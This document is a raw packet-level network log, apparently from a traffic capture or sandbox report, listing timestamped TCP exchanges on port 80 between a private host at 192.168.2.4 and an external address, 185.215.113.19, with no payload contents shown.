Aug 31, 2024 22:41:57.493662119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493683100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493787050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493809938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493834019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493910074 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493930101 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493942022 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493952036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493963003 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493973970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493984938 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493994951 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494004965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494015932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494026899 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494038105 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494048119 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494059086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494070053 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494080067 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494091034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494101048 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494112015 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494123936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494134903 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494146109 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494155884 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494167089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494177103 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494189978 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494201899 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494213104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494224072 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494234085 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494245052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494255066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494266033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494277000 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494287968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494297981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494308949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494319916 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494330883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494342089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494353056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494364023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494374037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.494375944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494426966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494457960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494477987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494504929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494621038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494648933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494676113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494780064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494851112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494875908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494901896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.494998932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.495026112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.495050907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496006966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496047974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496100903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496119976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496145010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496165991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496187925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496212006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496227026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496248007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496268988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496288061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496306896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496325970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496341944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496361971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496382952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496402979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496423960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496443033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496463060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496485949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496504068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496521950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496545076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496561050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496578932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496601105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496613979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496637106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496653080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496678114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496694088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496716976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496738911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496759892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496771097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496794939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496815920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496825933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496850014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496867895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496887922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496902943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496923923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496938944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496964931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.496989012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497009039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497026920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497045994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497066021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497086048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497104883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497119904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497142076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497163057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.497761965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497777939 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497796059 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497807026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497817993 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497828007 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497838020 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497848988 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497859955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497869968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497880936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497891903 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497901917 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497912884 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497924089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497934103 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497945070 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497956038 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497966051 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497977018 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497987986 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.497997999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498008966 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498018980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498029947 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498040915 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498054028 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498064995 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498075962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498085976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498096943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498107910 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498120070 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498130083 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498140097 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498151064 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498162031 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498172045 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498183012 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498193979 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498204947 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498214960 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498226881 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498593092 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498606920 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498624086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498635054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498646021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498656034 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498667002 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498677969 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498687983 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498698950 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498709917 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498720884 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498732090 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498742104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498752117 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498763084 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498774052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498784065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498795033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498805046 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498815060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498826027 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498836040 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.498846054 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.500417948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500447035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500473976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500499964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500530958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500559092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500581980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500607014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500633955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500655890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500682116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500705957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500725031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500752926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500777960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500799894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.500824928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.502518892 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502531052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502541065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502552032 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502563000 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502573967 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502584934 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502594948 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502605915 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502616882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502626896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502638102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502648115 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502659082 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502671003 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502681017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502691984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502701998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502712965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502722979 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502733946 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502743959 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502754927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502764940 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502777100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502789974 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502800941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502810955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502820969 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502831936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502841949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502852917 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502862930 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502873898 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502883911 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.502895117 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.503948927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.503998995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504024029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504045010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504065037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504085064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504110098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504129887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504148006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504168987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504189014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504204988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504225016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504250050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504261971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504286051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504309893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504329920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504348993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504373074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504385948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504411936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504427910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504450083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504471064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504488945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504503965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504527092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504543066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504566908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504589081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504605055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504628897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504647970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504668951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504683971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504712105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504722118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504782915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504798889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504822016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504837990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504858971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504889011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504914999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504930019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504954100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504975080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.504996061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505017042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505037069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505058050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505074978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505095959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505110025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505131960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505155087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505167007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505194902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505209923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505234957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505247116 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.505256891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505259037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.505271912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505292892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505312920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505332947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505347013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505372047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505387068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505407095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505426884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505438089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505464077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505484104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505506039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505522013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505547047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505563021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505584955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505605936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505625010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505641937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505661011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505681038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505695105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505717039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505738020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505753994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505775928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505796909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505810022 CEST	49732	80	192.168.2.4	185.215.113.19
